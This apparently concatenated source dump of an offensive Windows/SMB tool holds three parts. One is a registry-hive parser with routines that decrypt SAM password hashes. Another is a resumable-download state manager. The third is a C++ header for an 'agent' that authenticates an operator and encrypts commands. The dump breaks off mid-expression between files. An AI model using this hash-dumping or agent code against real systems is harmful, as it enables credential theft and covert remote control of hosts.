key_num hr") 17 | VK_HDR = namedtuple("VK_HDR", "id name_len data_len data_off data_type flag unk1 value_name") 18 | HASH_RECORD = namedtuple("HASH_RECORD", "nk_offset keyname") 19 | 20 | 21 | class RegHive(object): 22 | def __init__(self, path): 23 | with open(path, "rb") as fd: 24 | self.__base = fd.read() 25 | self.__base = self.__base[0x1000:] 26 | 27 | self.__root_key = self.regGetRootKey() 28 | 29 | def regGetRootKey(self): 30 | n = self.__read_nk(0x20) 31 | return n if n.id == NK_ID and n.type == NK_ROOT else None 32 | 33 | def regOpenKey(self, path): 34 | n = self.__root_key 35 | path_split = path.split(b"\\") 36 | 37 | while len(path_split) > 0: 38 | t = path_split.pop(0) 39 | next_off = self.__parself(t, n.lf_off) 40 | if next_off == -1: 41 | return None 42 | n = self.__read_nk(next_off) 43 | 44 | return n 45 | 46 | def regQueryValue(self, n, value): 47 | for i in self.__read_valuelist(n): 48 | v = self.__read_vk(i) 49 | 50 | if v.value_name == value or (v.flag & 1) == 0: 51 | data_len = v.data_len & 0x0000FFFF 52 | return v.data_off if data_len < 5 else self.__read_data(v.data_off, data_len) 53 | 54 | def regEnumKey(self, nr): 55 | for i in range(nr.subkey_num): 56 | lf = self.__read_lf(nr.lf_off) 57 | hr = self.__read_hr(lf.hr, i) 58 | nk = self.__read_nk(hr.nk_offset) 59 | 60 | yield nk.key_name 61 | 62 | def __read_nk(self, offset): 63 | n = NK_HDR._make( 64 | unpack("hhiiiiiiiiiiiiiiiiihhs", self.__base[offset + 4 : offset + 4 + 77]) 65 | ) 66 | n = n._replace(key_name=self.__base[offset + 4 + 76 : offset + 4 + 76 + n.name_len]) 67 | 68 | return n 69 | 70 | def __read_lf(self, offset): 71 | lf = LF_HDR._make(unpack("hhB", self.__base[offset + 4 : offset + 4 + 5])) 72 | lf = lf._replace(hr=offset + 4 + 4) 73 | 74 | return lf 75 | 76 | def __read_hr(self, offset, index): 77 | offset += 8 * index 78 | hr = HASH_RECORD._make(unpack("i4s", self.__base[offset : offset + 8])) 79 | 80 | return hr 81 | 82 | def __parself(self, t, offset): 83 | l = self.__read_lf(offset) 84 | 85 | for i in range(l.key_num): 86 | hr = self.__read_hr(l.hr, i) 87 | n = self.__read_nk(hr.nk_offset) 88 | if t == n.key_name: 89 | return hr.nk_offset 90 | 91 | return -1 92 | 93 | def __read_vk(self, offset): 94 | vk = VK_HDR._make(unpack("hhiiihhs", self.__base[offset + 4 : offset + 4 + 21])) 95 | vk = vk._replace(value_name=self.__base[offset + 4 + 20 : offset + 4 + 20 + vk.name_len]) 96 | return vk 97 | 98 | def __read_valuelist(self, n): 99 | offset, size = n.value_off, n.value_cnt 100 | return unpack("%si" % size, self.__base[offset + 4 : offset + 4 + size * 4]) 101 | 102 | def __read_data(self, offset, size): 103 | return self.__base[offset + 4 : offset + 4 + size] 104 | 105 | def read_data(self, n): 106 | return self.__read_data(n.classname_off, n.classname_len) 107 | 108 | 109 | # Permutation matrix for boot key 110 | PERMUTATION_MATRIX = [ 111 | 0x8, 112 | 0x5, 113 | 0x4, 114 | 0x2, 115 | 0xB, 116 | 0x9, 117 | 0xD, 118 | 0x3, 119 | 0x0, 120 | 0x6, 121 | 0x1, 122 | 0xC, 123 | 0xE, 124 | 0xA, 125 | 0xF, 126 | 0x7, 127 | ] 128 | 129 | ODD_PARITY = [ 130 | 1, 131 | 1, 132 | 2, 133 | 2, 134 | 4, 135 | 4, 136 | 7, 137 | 7, 138 | 8, 139 | 8, 140 | 11, 141 | 11, 142 | 13, 143 | 13, 144 | 14, 145 | 14, 146 | 16, 147 | 16, 148 | 19, 149 | 19, 150 | 21, 151 | 21, 152 | 22, 153 | 22, 154 | 25, 155 | 25, 156 | 26, 157 | 26, 158 | 28, 159 | 28, 160 | 31, 161 | 31, 162 | 32, 163 | 32, 164 | 35, 165 | 35, 166 | 37, 167 | 37, 168 | 38, 169 | 38, 170 | 41, 171 | 41, 172 | 42, 173 | 42, 174 | 44, 175 | 44, 176 | 47, 177 | 47, 178 | 49, 179 | 49, 180 | 50, 181 | 50, 182 | 52, 183 | 52, 184 | 55, 185 | 55, 186 | 56, 187 | 56, 188 | 59, 189 | 59, 190 | 61, 191 | 61, 192 | 62, 193 | 62, 194 | 64, 195 | 64, 196 | 67, 197 | 67, 198 | 69, 199 | 69, 200 | 70, 201 | 70, 202 | 73, 203 | 73, 204 | 74, 205 | 74, 206 | 76, 207 | 76, 208 | 79, 209 | 79, 210 | 81, 211 | 81, 212 | 82, 213 | 82, 214 | 84, 215 | 84, 216 | 87, 217 | 87, 218 | 88, 219 | 88, 220 | 91, 221 | 91, 222 | 93, 223 | 93, 224 | 94, 225 | 94, 226 | 97, 227 | 97, 228 | 98, 229 | 98, 230 | 100, 231 | 100, 232 | 103, 233 | 103, 234 | 104, 235 | 104, 236 | 107, 237 | 107, 238 | 109, 239 | 109, 240 | 110, 241 | 110, 242 | 112, 243 | 112, 244 | 115, 245 | 115, 246 | 117, 247 | 117, 248 | 118, 249 | 118, 250 | 121, 251 | 121, 252 | 122, 253 | 122, 254 | 124, 255 | 124, 256 | 127, 257 | 127, 258 | 128, 259 | 128, 260 | 131, 261 | 131, 262 | 133, 263 | 133, 264 | 134, 265 | 134, 266 | 137, 267 | 137, 268 | 138, 269 | 138, 270 | 140, 271 | 140, 272 | 143, 273 | 143, 274 | 145, 275 | 145, 276 | 146, 277 | 146, 278 | 148, 279 | 148, 280 | 151, 281 | 151, 282 | 152, 283 | 152, 284 | 155, 285 | 155, 286 | 157, 287 | 157, 288 | 158, 289 | 158, 290 | 161, 291 | 161, 292 | 162, 293 | 162, 294 | 164, 295 | 164, 296 | 167, 297 | 167, 298 | 168, 299 | 168, 300 | 171, 301 | 171, 302 | 173, 303 | 173, 304 | 174, 305 | 174, 306 | 176, 307 | 176, 308 | 179, 309 | 179, 310 | 181, 311 | 181, 312 | 182, 313 | 182, 314 | 185, 315 | 185, 316 | 186, 317 | 186, 318 | 188, 319 | 188, 320 | 191, 321 | 191, 322 | 193, 323 | 193, 324 | 194, 325 | 194, 326 | 196, 327 | 196, 328 | 199, 329 | 199, 330 | 200, 331 | 200, 332 | 203, 333 | 203, 334 | 205, 335 | 205, 336 | 206, 337 | 206, 338 | 208, 339 | 208, 340 | 211, 341 | 211, 342 | 213, 343 | 213, 344 | 214, 345 | 214, 346 | 217, 347 | 217, 348 | 218, 349 | 218, 350 | 220, 351 | 220, 352 | 223, 353 | 223, 354 | 224, 355 | 224, 356 | 227, 357 | 227, 358 | 229, 359 | 229, 360 | 230, 361 | 230, 362 | 233, 363 | 233, 364 | 234, 365 | 234, 366 | 236, 367 | 236, 368 | 239, 369 | 239, 370 | 241, 371 | 241, 372 | 242, 373 | 242, 374 | 244, 375 | 244, 376 | 247, 377 | 247, 378 | 248, 379 | 248, 380 | 251, 381 | 251, 382 | 253, 383 | 253, 384 | 254, 385 | 254, 386 | ] 387 | 388 | 389 | def str_to_key(s): 390 | key = [ 391 | ord(s[0]) >> 1, 392 | ((ord(s[0]) & 0x01) << 6) | (ord(s[1]) >> 2), 393 | ((ord(s[1]) & 0x03) << 5) | (ord(s[2]) >> 3), 394 | ((ord(s[2]) & 0x07) << 4) | (ord(s[3]) >> 4), 395 | ((ord(s[3]) & 0x0F) << 3) | (ord(s[4]) >> 5), 396 | ((ord(s[4]) & 0x1F) << 2) | (ord(s[5]) >> 6), 397 | ((ord(s[5]) & 0x3F) << 1) | (ord(s[6]) >> 7), 398 | ord(s[6]) & 0x7F, 399 | ] 400 | 401 | return bytes(map(lambda k: ODD_PARITY[k << 1], key)) 402 | 403 | 404 | def sid_to_key(sid): 405 | s1 = "" 406 | s1 += chr(sid & 0xFF) 407 | s1 += chr((sid >> 8) & 0xFF) 408 | s1 += chr((sid >> 16) & 0xFF) 409 | s1 += chr((sid >> 24) & 0xFF) 410 | s1 += s1[0] 411 | s1 += s1[1] 412 | s1 += s1[2] 413 | s2 = s1[3] + s1[0] + s1[1] + s1[2] 414 | s2 += s2[0] + s2[1] + s2[2] 415 | 416 | return str_to_key(s1), str_to_key(s2) 417 | 418 | 419 | def decrypt_single_hash(rid, hbootkey, enc_hash, apwd): 420 | d1, d2 = map(lambda k: DES.new(k, DES.MODE_ECB), sid_to_key(rid)) 421 | 422 | rc4_key = MD5.new(hbootkey[:0x10] + pack(" str: 46 | """Generate unique state file path based on local path hash""" 47 | # Use SHA256 of local path for unique filename 48 | path_hash = hashlib.sha256(self.local_path.encode()).hexdigest()[:16] 49 | 50 | # Store in .slinger directory in user's home 51 | slinger_dir = Path.home() / ".slinger" / "downloads" 52 | slinger_dir.mkdir(parents=True, exist_ok=True) 53 | 54 | state_filename = f"download_{path_hash}.json" 55 | return str(slinger_dir / state_filename) 56 | 57 | def save_state(self) -> bool: 58 | """ 59 | Atomically save download state to file. 60 | 61 | Uses temporary file + rename for atomic operation to prevent corruption. 62 | """ 63 | try: 64 | state_data = { 65 | "version": self.state_version, 66 | "remote_path": self.remote_path, 67 | "local_path": self.local_path, 68 | "total_size": self.total_size, 69 | "bytes_downloaded": self.bytes_downloaded, 70 | "chunk_size": self.chunk_size, 71 | "checksum_type": self.checksum_type, 72 | "partial_checksum": self.partial_checksum, 73 | "last_modified": self.last_modified, 74 | "retry_count": self.retry_count, 75 | "max_retries": self.max_retries, 76 | "timestamp": datetime.now(timezone.utc).isoformat(), 77 | } 78 | 79 | # Atomic write: write to temp file then rename 80 | temp_path = self.state_file_path + ".tmp" 81 | 82 | with open(temp_path, "w") as f: 83 | json.dump(state_data, f, indent=2) 84 | 85 | # Atomic rename 86 | os.rename(temp_path, self.state_file_path) 87 | print_debug(f"Saved download state: {self.bytes_downloaded}/{self.total_size} bytes") 88 | return True 89 | 90 | except Exception as e: 91 | print_debug(f"Failed to save download state: {e}") 92 | return False 93 | 94 | @classmethod 95 | def load_state(cls, local_path: str) -> Optional["DownloadState"]: 96 | """ 97 | Load existing download state from file. 98 | 99 | Returns None if no state file exists or if state is corrupted. 100 | """ 101 | try: 102 | # Create temporary instance to get state file path 103 | temp_state = cls("", local_path) 104 | state_file_path = temp_state.state_file_path 105 | 106 | if not os.path.exists(state_file_path): 107 | print_debug(f"No existing state file found for: {local_path}") 108 | return None 109 | 110 | with open(state_file_path, "r") as f: 111 | state_data = json.load(f) 112 | 113 | # Validate state file version 114 | if state_data.get("version") != "1.0": 115 | print_warning(f"Unsupported state file version: {state_data.get('version')}") 116 | return None 117 | 118 | # Create state instance from loaded data 119 | state = cls( 120 | state_data["remote_path"], state_data["local_path"], state_data["total_size"] 121 | ) 122 | 123 | state.bytes_downloaded = state_data["bytes_downloaded"] 124 | state.chunk_size = state_data["chunk_size"] 125 | state.checksum_type = state_data["checksum_type"] 126 | state.partial_checksum = state_data["partial_checksum"] 127 | state.last_modified = state_data["last_modified"] 128 | state.retry_count = state_data["retry_count"] 129 | state.max_retries = state_data["max_retries"] 130 | 131 | print_debug(f"Loaded download state: {state.bytes_downloaded}/{state.total_size} bytes") 132 | return state 133 | 134 | except Exception as e: 135 | print_debug(f"Failed to load download state: {e}") 136 | return None 137 | 138 | def validate_resume(self) -> Tuple[bool, str]: 139 | """ 140 | Validate that resume is possible and safe. 141 | 142 | Returns: 143 | (is_valid, error_message) 144 | """ 145 | try: 146 | # Check if local file exists 147 | if not os.path.exists(self.local_path): 148 | return False, "Local partial file does not exist" 149 | 150 | # Check local file size matches our state 151 | local_size = os.path.getsize(self.local_path) 152 | if local_size != self.bytes_downloaded: 153 | return ( 154 | False, 155 | f"Local file size ({local_size}) doesn't match state ({self.bytes_downloaded})", 156 | ) 157 | 158 | # Check if we've exceeded retry limits 159 | if self.retry_count >= self.max_retries: 160 | return False, f"Maximum retries ({self.max_retries}) exceeded" 161 | 162 | # Check if download is already complete 163 | if self.bytes_downloaded >= self.total_size and self.total_size > 0: 164 | return False, "Download already complete" 165 | 166 | return True, "Resume validation successful" 167 | 168 | except Exception as e: 169 | return False, f"Resume validation error: {e}" 170 | 171 | def update_progress(self, bytes_written: int) -> None: 172 | """Update download progress and save state""" 173 | self.bytes_downloaded += bytes_written 174 | self.last_modified = datetime.now(timezone.utc).isoformat() 175 | self.save_state() 176 | 177 | def increment_retry(self) -> bool: 178 | """ 179 | Increment retry counter. 180 | 181 | Returns: 182 | True if retry is allowed, False if max retries exceeded 183 | """ 184 | self.retry_count += 1 185 | self.save_state() 186 | return self.retry_count < self.max_retries 187 | 188 | def get_resume_offset(self) -> int: 189 | """Get the byte offset to resume download from""" 190 | return self.bytes_downloaded 191 | 192 | def get_remaining_bytes(self) -> int: 193 | """Get number of bytes remaining to download""" 194 | return max(0, self.total_size - self.bytes_downloaded) 195 | 196 | def get_progress_percentage(self) -> float: 197 | """Get download progress as percentage""" 198 | if self.total_size == 0: 199 | return 0.0 200 | return (self.bytes_downloaded / self.total_size) * 100 201 | 202 | def cleanup(self) -> bool: 203 | """Remove state file (called on successful completion)""" 204 | try: 205 | if os.path.exists(self.state_file_path): 206 | os.remove(self.state_file_path) 207 | print_debug(f"Cleaned up state file: {self.state_file_path}") 208 | return True 209 | except Exception as e: 210 | print_debug(f"Failed to cleanup state file: {e}") 211 | return False 212 | 213 | def __str__(self) -> str: 214 | """String representation for debugging""" 215 | return ( 216 | f"DownloadState(remote='{self.remote_path}', " 217 | f"local='{self.local_path}', " 218 | f"progress={self.get_progress_percentage():.1f}%, " 219 | f"bytes={self.bytes_downloaded}/{self.total_size})" 220 | ) 221 | 222 | 223 | class DownloadStateManager: 224 | """ 225 | High-level manager for download states. 226 | 227 | Provides utilities for listing, cleaning up, and managing multiple download states. 228 | """ 229 | 230 | @staticmethod 231 | def list_active_downloads() -> list: 232 | """List all active download states""" 233 | try: 234 | downloads_dir = Path.home() / ".slinger" / "downloads" 235 | if not downloads_dir.exists(): 236 | return [] 237 | 238 | active_downloads = [] 239 | for state_file in downloads_dir.glob("download_*.json"): 240 | try: 241 | with open(state_file, "r") as f: 242 | state_data = json.load(f) 243 | 244 | progress = 0.0 245 | if state_data["total_size"] > 0: 246 | progress = (state_data["bytes_downloaded"] / state_data["total_size"]) * 100 247 | 248 | active_downloads.append( 249 | { 250 | "local_path": state_data["local_path"], 251 | "remote_path": state_data["remote_path"], 252 | "progress": progress, 253 | "bytes_downloaded": state_data["bytes_downloaded"], 254 | "total_size": state_data["total_size"], 255 | "last_modified": state_data.get( 256 | "timestamp", state_data.get("last_modified", "") 257 | ), 258 | } 259 | ) 260 | except Exception as e: 261 | print_debug(f"Skipping corrupted state file {state_file}: {e}") 262 | continue 263 | 264 | return active_downloads 265 | 266 | except Exception as e: 267 | print_debug(f"Error listing active downloads: {e}") 268 | return [] 269 | 270 | @staticmethod 271 | def cleanup_completed_downloads() -> int: 272 | """Remove state files for completed downloads""" 273 | try: 274 | downloads_dir = Path.home() / ".slinger" / "downloads" 275 | if not downloads_dir.exists(): 276 | return 0 277 | 278 | cleaned_count = 0 279 | for state_file in downloads_dir.glob("download_*.json"): 280 | try: 281 | with open(state_file, "r") as f: 282 | state_data = json.load(f) 283 | 284 | # Check if download is complete 285 | local_path = state_data["local_path"] 286 | if os.path.exists(local_path): 287 | local_size = os.path.getsize(local_path) 288 | total_size = state_data["total_size"] 289 | 290 | if total_size > 0 and local_size >= total_size: 291 | os.remove(state_file) 292 | cleaned_count += 1 293 | print_debug(f"Cleaned completed download state: {state_file}") 294 | else: 295 | # Local file doesn't exist, remove state 296 | os.remove(state_file) 297 | cleaned_count += 1 298 | print_debug(f"Cleaned orphaned download state: {state_file}") 299 | 300 | except Exception as e: 301 | print_debug(f"Error processing state file {state_file}: {e}") 302 | continue 303 | 304 | return cleaned_count 305 | 306 | except Exception as e: 307 | print_debug(f"Error cleaning up downloads: {e}") 308 | return 0 309 | 310 | @staticmethod 311 | def cleanup_stale_downloads(max_age_days: int = 7) -> int: 312 | """Remove state files older than specified days""" 313 | try: 314 | downloads_dir = Path.home() / ".slinger" / "downloads" 315 | if not downloads_dir.exists(): 316 | return 0 317 | 318 | current_time = time.time() 319 | max_age_seconds = max_age_days * 24 * 60 * 60 320 | cleaned_count = 0 321 | 322 | for state_file in downloads_dir.glob("download_*.json"): 323 | try: 324 | file_age = current_time - os.path.getmtime(state_file) 325 | if file_age > max_age_seconds: 326 | os.remove(state_file) 327 | cleaned_count += 1 328 | print_debug(f"Cleaned stale download state: {state_file}") 329 | except Exception as e: 330 | print_debug(f"Error processing stale file {state_file}: {e}") 331 | continue 332 | 333 | return cleaned_count 334 | 335 | except Exception as e: 336 | print_debug(f"Error cleaning up stale downloads: {e}") 337 | return 0 338 | 339 | 340 | def parse_chunk_size(chunk_size_str: str) -> int: 341 | """ 342 | Parse human-readable chunk size string to bytes. 343 | 344 | Examples: '64k', '1M', '512', '2MB' 345 | """ 346 | if not chunk_size_str: 347 | return 64 * 1024 # Default 64KB 348 | 349 | chunk_size_str = chunk_size_str.strip().upper() 350 | 351 | # Default to bytes if no unit specified 352 | if chunk_size_str.isdigit(): 353 | return int(chunk_size_str) 354 | 355 | # Parse size with unit 356 | try: 357 | if chunk_size_str.endswith("K") or chunk_size_str.endswith("KB"): 358 | number = chunk_size_str.rstrip("KB") 359 | return int(number) * 1024 360 | elif chunk_size_str.endswith("M") or chunk_size_str.endswith("MB"): 361 | number = chunk_size_str.rstrip("MB") 362 | return int(number) * 1024 * 1024 363 | elif chunk_size_str.endswith("G") or chunk_size_str.endswith("GB"): 364 | number = chunk_size_str.rstrip("GB") 365 | return int(number) * 1024 * 1024 * 1024 366 | else: 367 | # Unknown unit, default to bytes 368 | return int(chunk_size_str.rstrip("ABCDEFGHIJKLMNOPQRSTUVWXYZ")) 369 | except ValueError: 370 | print_warning(f"Invalid chunk size '{chunk_size_str}', using default 64KB") 371 | return 64 * 1024 372 | -------------------------------------------------------------------------------- /lib/agent_templates/auth_protocol.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "crypto.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | 8 | namespace crypto { 9 | 10 | /** 11 | * Simplified Challenge-Response Authentication Protocol 12 | * 13 | * Flow: 14 | * 1. Agent sends 16-byte random nonce on connection 15 | * 2. Client responds with HMAC-SHA256(passphrase, nonce) + encrypted command 16 | * 3. Agent verifies HMAC and derives session key from nonce+passphrase_hash 17 | * 4. All future messages encrypted with session-specific AES-256-GCM key 18 | * 19 | * Security Properties: 20 | * - Requires attacker to have: pcap + binary + active participation 21 | * - Replay attacks prevented by random nonce per session 22 | * - Forward secrecy through session-specific keys (each nonce creates unique key) 23 | * - No plaintext passphrase in agent (only SHA256 hash) 24 | * 25 | * Protocol Constants: 26 | * - NONCE_SIZE = 16 bytes 27 | * - HMAC_SIZE = 32 bytes (SHA-256 output) 28 | * - PBKDF2_ITERATIONS = 10000 29 | * - SESSION_KEY_SIZE = 32 bytes (AES-256) 30 | */ 31 | class AuthProtocol { 32 | private: 33 | uint8_t passphrase_hash[32]; // SHA256(passphrase) - embedded in agent 34 | uint8_t session_key[32]; // PBKDF2(passphrase_hash, nonce) 35 | uint8_t session_nonce[16]; // Random nonce for this session 36 | bool authenticated; 37 | 38 | public: 39 | static const size_t NONCE_SIZE = 16; 40 | static const size_t HMAC_SIZE = 32; 41 | static const size_t SESSION_KEY_SIZE = 32; 42 | static const int PBKDF2_ITERATIONS = 10000; 43 | 44 | AuthProtocol() : authenticated(false) { 45 | SecureMemory::zero(passphrase_hash, sizeof(passphrase_hash)); 46 | SecureMemory::zero(session_key, sizeof(session_key)); 47 | SecureMemory::zero(session_nonce, sizeof(session_nonce)); 48 | } 49 | 50 | ~AuthProtocol() { 51 | // Securely zero all sensitive data 52 | SecureMemory::zero(passphrase_hash, sizeof(passphrase_hash)); 53 | SecureMemory::zero(session_key, sizeof(session_key)); 54 | SecureMemory::zero(session_nonce, sizeof(session_nonce)); 55 | } 56 | 57 | /** 58 | * Initialize with passphrase (called at agent build time) 59 | * 60 | * Stores SHA256(passphrase) in agent binary - NOT the plaintext passphrase. 61 | * This allows HMAC verification without exposing the passphrase. 62 | * 63 | * @param passphrase User's passphrase 64 | * @return true on success 65 | */ 66 | bool initialize_with_passphrase(const char* passphrase) { 67 | // Hash the passphrase with SHA256 68 | // This is what gets embedded in the agent binary 69 | SHA256 sha256; 70 | sha256.update((const uint8_t*)passphrase, strlen(passphrase)); 71 | sha256.finalize(passphrase_hash); 72 | 73 | #ifdef DEBUG_MODE 74 | DEBUG_LOG_CAT("AUTH_INIT", "Passphrase hash initialized"); 75 | #endif 76 | 77 | return true; 78 | } 79 | 80 | /** 81 | * Agent-side: Send challenge and authenticate client 82 | * 83 | * Steps: 84 | * 1. Generate random 16-byte nonce 85 | * 2. Send nonce to client (unencrypted) 86 | * 3. Receive HMAC response from client 87 | * 4. Verify HMAC matches expected value 88 | * 5. Derive session key from nonce+passphrase_hash 89 | * 6. Mark as authenticated 90 | * 91 | * @param send_raw Send raw bytes (nonce) 92 | * @param read_raw Read raw bytes (HMAC response) 93 | * @return true if authentication successful 94 | */ 95 | bool authenticate_as_agent( 96 | std::function send_raw, 97 | std::function read_raw) { 98 | 99 | // Step 1: Generate random nonce for this session 100 | if (!SecureRandom::generate(session_nonce, NONCE_SIZE)) { 101 | #ifdef DEBUG_MODE 102 | DEBUG_LOG_CAT("AUTH", "Failed to generate session nonce"); 103 | #endif 104 | return false; 105 | } 106 | 107 | #ifdef DEBUG_MODE 108 | DEBUG_LOG_CAT("AUTH", "Generated session nonce (16 bytes)"); 109 | #endif 110 | 111 | // Step 2: Send nonce to client 112 | if (!send_raw(session_nonce, NONCE_SIZE)) { 113 | #ifdef DEBUG_MODE 114 | DEBUG_LOG_CAT("AUTH", "Failed to send nonce to client"); 115 | #endif 116 | return false; 117 | } 118 | 119 | #ifdef DEBUG_MODE 120 | DEBUG_LOG_CAT("AUTH", "Sent nonce to client, waiting for HMAC response..."); 121 | #endif 122 | 123 | // Step 3: Receive HMAC response (32 bytes) 124 | uint8_t received_hmac[HMAC_SIZE]; 125 | if (!read_raw(received_hmac, HMAC_SIZE)) { 126 | #ifdef DEBUG_MODE 127 | DEBUG_LOG_CAT("AUTH", "Failed to receive HMAC response from client"); 128 | #endif 129 | return false; 130 | } 131 | 132 | #ifdef DEBUG_MODE 133 | DEBUG_LOG_CAT("AUTH", "Received HMAC response (32 bytes)"); 134 | // Log received HMAC in hex 135 | std::string received_hex; 136 | for (int i = 0; i < HMAC_SIZE; i++) { 137 | char buf[3]; 138 | sprintf(buf, "%02x", received_hmac[i]); 139 | received_hex += buf; 140 | } 141 | DEBUG_LOG_CAT("AUTH", "Received HMAC: " + received_hex); 142 | #endif 143 | 144 | // Step 4: Compute expected HMAC = HMAC-SHA256(passphrase_hash, nonce) 145 | uint8_t expected_hmac[HMAC_SIZE]; 146 | 147 | #ifdef DEBUG_MODE 148 | // Log input parameters BEFORE calling HMAC 149 | DEBUG_LOG_CAT("AUTH", "About to compute HMAC with:"); 150 | DEBUG_LOG_CAT("AUTH", " sizeof(passphrase_hash) = " + std::to_string(sizeof(passphrase_hash))); 151 | DEBUG_LOG_CAT("AUTH", " NONCE_SIZE = " + std::to_string(NONCE_SIZE)); 152 | 153 | // Log passphrase hash 154 | std::string hash_hex; 155 | for (int i = 0; i < 32; i++) { 156 | char buf[3]; 157 | sprintf(buf, "%02x", passphrase_hash[i]); 158 | hash_hex += buf; 159 | } 160 | DEBUG_LOG_CAT("AUTH", " Passphrase hash: " + hash_hex); 161 | 162 | // Log session nonce 163 | std::string nonce_hex; 164 | for (int i = 0; i < NONCE_SIZE; i++) { 165 | char buf[3]; 166 | sprintf(buf, "%02x", session_nonce[i]); 167 | nonce_hex += buf; 168 | } 169 | DEBUG_LOG_CAT("AUTH", " Session nonce: " + nonce_hex); 170 | #endif 171 | 172 | if (!HMAC_SHA256::compute(passphrase_hash, sizeof(passphrase_hash), 173 | session_nonce, NONCE_SIZE, 174 | expected_hmac)) { 175 | #ifdef DEBUG_MODE 176 | DEBUG_LOG_CAT("AUTH", "Failed to compute expected HMAC"); 177 | #endif 178 | return false; 179 | } 180 | 181 | #ifdef DEBUG_MODE 182 | // Log computed HMAC result 183 | std::string expected_hex; 184 | for (int i = 0; i < HMAC_SIZE; i++) { 185 | char buf[3]; 186 | sprintf(buf, "%02x", expected_hmac[i]); 187 | expected_hex += buf; 188 | } 189 | DEBUG_LOG_CAT("AUTH", "Computed expected HMAC: " + expected_hex); 190 | #endif 191 | 192 | // Step 5: Verify HMAC (constant-time comparison) 193 | if (!HMAC_SHA256::constant_time_compare(received_hmac, expected_hmac, HMAC_SIZE)) { 194 | #ifdef DEBUG_MODE 195 | DEBUG_LOG_CAT("AUTH", "HMAC verification FAILED - wrong passphrase"); 196 | #endif 197 | return false; // Wrong passphrase - disconnect 198 | } 199 | 200 | #ifdef DEBUG_MODE 201 | DEBUG_LOG_CAT("AUTH", "HMAC verification SUCCESS"); 202 | #endif 203 | 204 | // Step 6: Derive session key using PBKDF2 205 | // session_key = PBKDF2-HMAC-SHA256(passphrase_hash, nonce, 10k iterations) 206 | if (!PBKDF2::derive_key((const char*)passphrase_hash, sizeof(passphrase_hash), 207 | session_nonce, NONCE_SIZE, 208 | PBKDF2_ITERATIONS, 209 | session_key, SESSION_KEY_SIZE)) { 210 | #ifdef DEBUG_MODE 211 | DEBUG_LOG_CAT("AUTH", "Failed to derive session key"); 212 | #endif 213 | return false; 214 | } 215 | 216 | #ifdef DEBUG_MODE 217 | DEBUG_LOG_CAT("AUTH", "Session key derived - authentication complete"); 218 | #endif 219 | 220 | authenticated = true; 221 | return true; 222 | } 223 | 224 | /** 225 | * Derive session key from passphrase and nonce 226 | * 227 | * Used by both agent and client to derive the same session key. 228 | * Agent uses passphrase_hash, client uses actual passphrase. 229 | * 230 | * @param passphrase_or_hash Passphrase (client) or passphrase hash (agent) 231 | * @param passphrase_len Length of passphrase/hash 232 | * @param nonce Session nonce 233 | * @param nonce_len Length of nonce (should be 16) 234 | * @param output Output buffer for session key (32 bytes) 235 | * @return true on success 236 | */ 237 | bool derive_session_key(const uint8_t* passphrase_or_hash, size_t passphrase_len, 238 | const uint8_t* nonce, size_t nonce_len, 239 | uint8_t* output) { 240 | return PBKDF2::derive_key((const char*)passphrase_or_hash, passphrase_len, 241 | nonce, nonce_len, 242 | PBKDF2_ITERATIONS, 243 | output, SESSION_KEY_SIZE); 244 | } 245 | 246 | /** 247 | * Encrypt a message with AES-256-GCM using session key 248 | * 249 | * Message format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 250 | * 251 | * @param plaintext Message to encrypt 252 | * @param output Formatted encrypted message 253 | * @return true on success 254 | */ 255 | bool encrypt_message(const std::string& plaintext, std::string& output) { 256 | if (!authenticated) { 257 | #ifdef DEBUG_MODE 258 | DEBUG_LOG_CAT("ENCRYPT", "Cannot encrypt - not authenticated"); 259 | #endif 260 | return false; 261 | } 262 | 263 | AES_GCM::EncryptedData encrypted; 264 | if (!AES_GCM::encrypt(session_key, 265 | (const uint8_t*)plaintext.c_str(), 266 | plaintext.length(), 267 | encrypted)) { 268 | #ifdef DEBUG_MODE 269 | DEBUG_LOG_CAT("ENCRYPT", "AES-GCM encryption failed"); 270 | #endif 271 | return false; 272 | } 273 | 274 | // Format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 275 | std::ostringstream oss; 276 | oss << "ENCRYPTED|"; 277 | 278 | // IV (12 bytes) 279 | for (size_t i = 0; i < encrypted.iv.size(); i++) { 280 | char buf[3]; 281 | snprintf(buf, sizeof(buf), "%02x", encrypted.iv[i]); 282 | oss << buf; 283 | } 284 | oss << "|"; 285 | 286 | // Tag (16 bytes) 287 | for (size_t i = 0; i < encrypted.tag.size(); i++) { 288 | char buf[3]; 289 | snprintf(buf, sizeof(buf), "%02x", encrypted.tag[i]); 290 | oss << buf; 291 | } 292 | oss << "|"; 293 | 294 | // Ciphertext 295 | for (size_t i = 0; i < encrypted.ciphertext.size(); i++) { 296 | char buf[3]; 297 | snprintf(buf, sizeof(buf), "%02x", encrypted.ciphertext[i]); 298 | oss << buf; 299 | } 300 | 301 | output = oss.str(); 302 | return true; 303 | } 304 | 305 | /** 306 | * Decrypt a message with AES-256-GCM using session key 307 | * 308 | * Expected format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 309 | * 310 | * @param input Formatted encrypted message 311 | * @param plaintext Decrypted message output 312 | * @return true on success 313 | */ 314 | bool decrypt_message(const std::string& input, std::string& plaintext) { 315 | if (!authenticated) { 316 | #ifdef DEBUG_MODE 317 | DEBUG_LOG_CAT("DECRYPT", "Cannot decrypt - not authenticated"); 318 | #endif 319 | return false; 320 | } 321 | 322 | if (input.substr(0, 10) != "ENCRYPTED|") { 323 | #ifdef DEBUG_MODE 324 | DEBUG_LOG_CAT("DECRYPT", "Invalid message format - missing ENCRYPTED| prefix"); 325 | #endif 326 | return false; 327 | } 328 | 329 | // Parse: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 330 | size_t pos1 = input.find('|', 10); 331 | size_t pos2 = input.find('|', pos1 + 1); 332 | 333 | if (pos1 == std::string::npos || pos2 == std::string::npos) { 334 | #ifdef DEBUG_MODE 335 | DEBUG_LOG_CAT("DECRYPT", "Invalid message format - missing separators"); 336 | #endif 337 | return false; 338 | } 339 | 340 | std::string iv_hex = input.substr(10, pos1 - 10); 341 | std::string tag_hex = input.substr(pos1 + 1, pos2 - pos1 - 1); 342 | std::string ciphertext_hex = input.substr(pos2 + 1); 343 | 344 | AES_GCM::EncryptedData encrypted; 345 | 346 | // Parse IV (should be 12 bytes = 24 hex chars) 347 | encrypted.iv.resize(iv_hex.length() / 2); 348 | for (size_t i = 0; i < encrypted.iv.size(); i++) { 349 | 